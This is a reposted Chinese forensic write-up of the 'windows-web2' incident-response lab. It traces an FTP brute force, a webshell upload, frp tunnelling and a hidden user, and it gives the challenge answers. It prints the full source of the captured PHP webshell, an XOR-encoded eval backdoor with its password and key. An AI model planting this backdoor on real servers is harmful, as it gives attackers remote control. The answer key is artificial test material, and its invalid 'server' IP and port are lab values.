windows-web2

news/2025/4/1 18:29:00/文章来源:https://www.cnblogs.com/yk1ng/p/18795306

windows-web2

挑战内容

前景需要:小李在某单位驻场值守,深夜12点,甲方已经回家了,小李刚偷偷摸鱼后,发现安全设备有告警,于是立刻停掉了机器开始排查。

这是他的服务器系统,请你找出以下内容,并作为通关条件:

1.攻击者的IP地址(两个)?

2.攻击者的webshell文件名?

3.攻击者的webshell密码?

4.攻击者的伪QQ号?

5.攻击者的伪服务器IP地址?

6.攻击者的服务器端口?

7.攻击者是如何入侵的(选择题)?

8.攻击者的隐藏用户名?

关于靶机启动

使用Vmware启动即可,如启动错误,请升级至Vmware17.5以上

图片

关于解题

直接运行桌面上“解题.exe”即可

图片

图片

相关账户密码

用户:administrator

密码:Zgsf@qq.com

解题

1.攻击者的IP地址(两个)?

查看apache日志可以看到有大量的访问并且响应是404的,明显是在扫描目录

image-20250327084632190

ip1:192.168.126.135

使用工具查看远程登录日志

image-20250327085942566

ip2:192.168.126.129

2.攻击者的webshell文件名?

上传D盾扫描找到

image-20250327085019984

在日志中基本也可以确定

文件为system.php

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}
$pass='hack6618';
$payloadName='payload';
$key='7813d1590d28a7dd';
if (isset($_POST[$pass])){$data=encode(base64_decode($_POST[$pass]),$key);if (isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);if (strpos($payload,"getBasicsInfo")===false){$payload=encode($payload,$key);}eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);}else{if (strpos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}
}

3.攻击者的webshell密码?

hack6618

4.攻击者的伪QQ号?

删除用户时发现

image-20250327091427822

没有看到hack用户,猜测为administrator的隐藏用户‘

在注册表中进行删除

在文档中找到Tencent file,应该是进行过通讯

image-20250327092146694

找到伪造的QQ号

777888999321

5.攻击者的伪服务器IP地址?

777888999321文档中找到frp(内网穿透)

查看frp的配置文件

image-20250327092332010

伪服务器ip地址:256.256.66.88

6.攻击者的服务器端口?

端口:65536

7.攻击者是如何入侵的(选择题)?

在ftp日志中可以看到大量的登录失败

ftp爆破->上传system.php->拿到shell

8.攻击者的隐藏用户名?

image-20250327092517994

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/906559.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【入门】 Python中return 和 print 区别

return 和 print 是 Python 中两个完全不同的概念,主要区别如下: return 的作用用于函数中,表示函数的返回值。 执行 return 后,函数会立即终止,并将指定的值返回给调用者。 如果不写 return,函数默认返回 None。  def add(a, b): return a + b # 返回计算结果 res…

thinkphp6---宝塔nginx-websocket连接wss

基础环境:thinkphp6-https-ssl+nginx 搭建一个websocket其实非常简单,可以参考我的这篇博文:https://www.cnblogs.com/e0yu/p/18740184可以参考:按照这个流程使用在http的网站里面接入,使用 ws 是没有问题的,但是实际的生成应用里面,使用的https,那么就要使用 wss 不然…

3.14饮料自动售货机

实现步骤创建VendingMachine类实现饮料选择逻辑实现代码(Java Swing)javaimport javax.swing.*; import java.awt.*; import java.awt.event.ActionEvent; import java.awt.event.ActionListener;public class VendingMachineGUI extends JFrame {private JButton orangeJuic…

【一步步开发AI运动APP】三、使用相机组件抽帧

之前我们为您分享了【一步步开发AI运动小程序】开发系列博文,通过该系列博文,很多开发者开发出了很多精美的AI健身、线上运动赛事、AI学生体测、美体、康复锻炼等应用场景的AI运动小程序;为了帮助开发者继续深耕AI运动领域市场,今天开始我们将为您分享新系列【一步步开发AI…

Docker Desktop,docker save 报错:Error response from daemon: write xxx : no space left on device

前言 在使用 docker save 时报错:docker save lanling-text-trainer:v1 -o lanling-text-trainer.tar Error response from daemon: write /var/lib/docker/tmp/docker-export-1292051631/34bda97aaedafa599cb48e60f010ce2e474f725817509a2153979af694021656/layer.tar: no sp…

19K+ Star!一款基于 Vue3 实现的后台管理系统!

vue-manage-system —— 一套基于 Vue3 + Element Plus + TypeScript 实现的多功能的后台前端模板框架,适用于绝大部分的后台管理系统开发。大家好,我是 Java陈序员。 今天,给大家推荐一款基于 Vue3 实现的后台管理系统前端模板框架,适合外包项目,实现快速交付!关注微信公…

3.10黑盒测试

实验一 黑盒测试 一、实验目的 1、 掌握黑盒测试的基础知识; 2、 掌握黑盒测试的检查内容及测试目的; 3、 掌握黑盒测试的几种基本测试方法:等价类划分方法、边界值分析方法、因果图法和决策表法; 二、实验要求 1、 复习有关内容,理解黑盒测试; 2、 掌握等价类划分、…

利用大模型LLM生成训练数据

项目:https://github.com/jiangnanboy/llm_dataset_generation这里假设一家海嘉物流公司,此公司需做一个关于本公司物流的问答机器人,需要判断用户的查询语句是否与本公司物流相关,需要训练数据进行分类,故利用deepseek进行生成与审核,免于无数据和标注的烦恼。 datas…

20231904 2023-2024-2 《网络攻防实践》实验五

一、实践内容 (1)配置Linux操作系统平台上的iptables,完成过滤ICMP数据包和特定IP地址访问主机等功能; (2)使用Snort对pcap文件进行入侵检测,获得并分析报警日志; (3)分析虚拟网络攻防环境中蜜网网关的防火墙和IDS/IPS配置规则。 二、实践过程 本次实验使用以下虚拟机…

如何高效智能地进行设备数据采集,提高企业核心竞争力?

机台设备数据采集是指通过各种技术手段和设备,从生产制造过程中的机台设备上获取各种相关数据的过程。采集的目的:1.生产监控:实时了解机台设备的运行状态,如是否正常工作、运行速度、工作时长等,以便及时发现设备故障或异常情况,保障生产过程的连续性和稳定性。 2.质量控…

树莓派2B的选购建议及相关分析

# 2015年淘宝买了一块树莓派2B,10多年过去了软件支持还是可以运行,非常给力!一、树莓派2B的硬件特性与适用场景基础配置处理器:搭载Broadcom BCM2836芯片,4核ARM Cortex-A7,主频900MHz。 内存:1GB RAM(早期版本可能为512MB)。 接口:4个USB 2.0、HDMI、以太网口、Micr…

2025必看:跨网文件安全交换系统 如何提升数据保护和管理能力?

在数字化转型的浪潮中,企业数据已成为核心资产。然而,随着企业业务的扩展和全球化,跨网文件交换变得越来越频繁,数据泄露、未授权访问和合规性问题也随之而来。传统的文件交换方式(如电子邮件、FTP等)已无法满足企业对数据安全和高效管理的需求。因此,引入专业的跨网文件…